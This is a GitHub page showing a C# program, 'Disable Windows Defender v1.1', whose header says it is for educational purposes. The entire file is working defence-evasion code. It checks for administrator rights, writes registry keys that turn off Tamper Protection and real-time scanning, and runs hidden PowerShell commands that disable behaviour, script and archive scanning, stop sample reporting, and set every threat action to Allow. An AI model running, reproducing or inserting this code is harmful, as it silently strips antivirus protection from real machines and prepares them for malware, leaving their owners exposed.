Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Disable-Windows-Defender/Disable-Windows-Defender/Program.cs /
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
128 lines (105 sloc)
5.9 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using Microsoft.Win32; | |
| using System.Diagnostics; | |
| using System.Security.Principal; | |
| // │ Author : NYAN CAT | |
| // │ Name : Disable Windows Defender v1.1 | |
| // │ Contact : https://github.com/NYAN-x-CAT | |
| // This program is distributed for educational purposes only. | |
| namespace Disable_Windows_Defender | |
| { | |
| class Program | |
| { | |
| static void Main() | |
| { | |
| if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return; | |
| RegistryEdit(@"SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0"); //Windows 10 1903 Redstone 6 | |
| RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", "1"); | |
| RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", "1"); | |
| RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableOnAccessProtection", "1"); | |
| RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableScanOnRealtimeEnable", "1"); | |
| CheckDefender(); | |
| } | |
| private static void RegistryEdit(string regPath, string name, string value) | |
| { | |
| try | |
| { | |
| using (RegistryKey key = Registry.LocalMachine.OpenSubKey(regPath, RegistryKeyPermissionCheck.ReadWriteSubTree)) | |
| { | |
| if (key == null) | |
| { | |
| Registry.LocalMachine.CreateSubKey(regPath).SetValue(name, value, RegistryValueKind.DWord); | |
| return; | |
| } | |
| if (key.GetValue(name) != (object)value) | |
| key.SetValue(name, value, RegistryValueKind.DWord); | |
| } | |
| } | |
| catch { } | |
| } | |
| private static void CheckDefender() | |
| { | |
| Process proc = new Process | |
| { | |
| StartInfo = new ProcessStartInfo | |
| { | |
| FileName = "powershell", | |
| Arguments = "Get-MpPreference -verbose", | |
| UseShellExecute = false, | |
| RedirectStandardOutput = true, | |
| WindowStyle = ProcessWindowStyle.Hidden, | |
| CreateNoWindow = true | |
| } | |
| }; | |
| proc.Start(); | |
| while (!proc.StandardOutput.EndOfStream) | |
| { | |
| string line = proc.StandardOutput.ReadLine(); | |
| if (line.StartsWith(@"DisableRealtimeMonitoring") && line.EndsWith("False")) | |
| RunPS("Set-MpPreference -DisableRealtimeMonitoring $true"); //real-time protection | |
| else if (line.StartsWith(@"DisableBehaviorMonitoring") && line.EndsWith("False")) | |
| RunPS("Set-MpPreference -DisableBehaviorMonitoring $true"); //behavior monitoring | |
| else if (line.StartsWith(@"DisableBlockAtFirstSeen") && line.EndsWith("False")) | |
| RunPS("Set-MpPreference -DisableBlockAtFirstSeen $true"); | |
| else if (line.StartsWith(@"DisableIOAVProtection") && line.EndsWith("False")) | |
| RunPS("Set-MpPreference -DisableIOAVProtection $true"); //scans all downloaded files and attachments | |
| else if (line.StartsWith(@"DisablePrivacyMode") && line.EndsWith("False")) | |
| RunPS("Set-MpPreference -DisablePrivacyMode $true"); //displaying threat history | |
| else if (line.StartsWith(@"SignatureDisableUpdateOnStartupWithoutEngine") && line.EndsWith("False")) | |
| RunPS("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"); //definition updates on startup | |
| else if (line.StartsWith(@"DisableArchiveScanning") && line.EndsWith("False")) | |
| RunPS("Set-MpPreference -DisableArchiveScanning $true"); //scan archive files, such as .zip and .cab files | |
| else if (line.StartsWith(@"DisableIntrusionPreventionSystem") && line.EndsWith("False")) | |
| RunPS("Set-MpPreference -DisableIntrusionPreventionSystem $true"); // network protection | |
| else if (line.StartsWith(@"DisableScriptScanning") && line.EndsWith("False")) | |
| RunPS("Set-MpPreference -DisableScriptScanning $true"); //scanning of scripts during scans | |
| else if (line.StartsWith(@"SubmitSamplesConsent") && !line.EndsWith("2")) | |
| RunPS("Set-MpPreference -SubmitSamplesConsent 2"); //MAPSReporting | |
| else if (line.StartsWith(@"MAPSReporting") && !line.EndsWith("0")) | |
| RunPS("Set-MpPreference -MAPSReporting 0"); //MAPSReporting | |
| else if (line.StartsWith(@"HighThreatDefaultAction") && !line.EndsWith("6")) | |
| RunPS("Set-MpPreference -HighThreatDefaultAction 6 -Force"); // high level threat // Allow | |
| else if (line.StartsWith(@"ModerateThreatDefaultAction") && !line.EndsWith("6")) | |
| RunPS("Set-MpPreference -ModerateThreatDefaultAction 6"); // moderate level threat | |
| else if (line.StartsWith(@"LowThreatDefaultAction") && !line.EndsWith("6")) | |
| RunPS("Set-MpPreference -LowThreatDefaultAction 6"); // low level threat | |
| else if (line.StartsWith(@"SevereThreatDefaultAction") && !line.EndsWith("6")) | |
| RunPS("Set-MpPreference -SevereThreatDefaultAction 6"); // severe level threat | |
| } | |
| } | |
| private static void RunPS(string args) | |
| { | |
| Process proc = new Process | |
| { | |
| StartInfo = new ProcessStartInfo | |
| { | |
| FileName = "powershell", | |
| Arguments = args, | |
| WindowStyle = ProcessWindowStyle.Hidden, | |
| CreateNoWindow = true | |
| } | |
| }; | |
| proc.Start(); | |
| } | |
| } | |
| } |